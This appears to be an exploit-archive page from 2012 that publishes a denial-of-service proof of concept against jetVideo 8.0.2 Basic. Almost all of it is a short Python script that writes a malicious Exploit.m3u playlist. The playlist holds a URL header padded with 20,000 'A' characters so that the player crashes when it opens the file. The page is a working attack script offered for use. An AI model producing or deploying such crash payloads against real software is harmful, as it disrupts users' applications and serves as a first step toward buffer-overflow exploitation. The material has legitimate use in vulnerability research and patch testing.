[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : jetVideo 8.0.2 Denial of Service
# Published : 2012-02-10
# Author :
# Previous Title : DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC
# Next Title : Free Mp3 Player 1.0 Local Denial of Service Vulnerability


# Exploit Title: [jetVideo Crash Exploit]
# Author: [Senator of Pirates]
# Email : [Senator.of.Pirates.team@gmail.com]
# Software Link: [http://www.jetaudio.com/download/jetvideo.html]
# Version: [8.0.2 Basic]
# Tested on: [Windows XP PS3 En]



header = "http://"
junk = "A" * 20000

payload = (header+junk)

f = open("Exploit.m3u","wb")
f.write(payload)
f.close()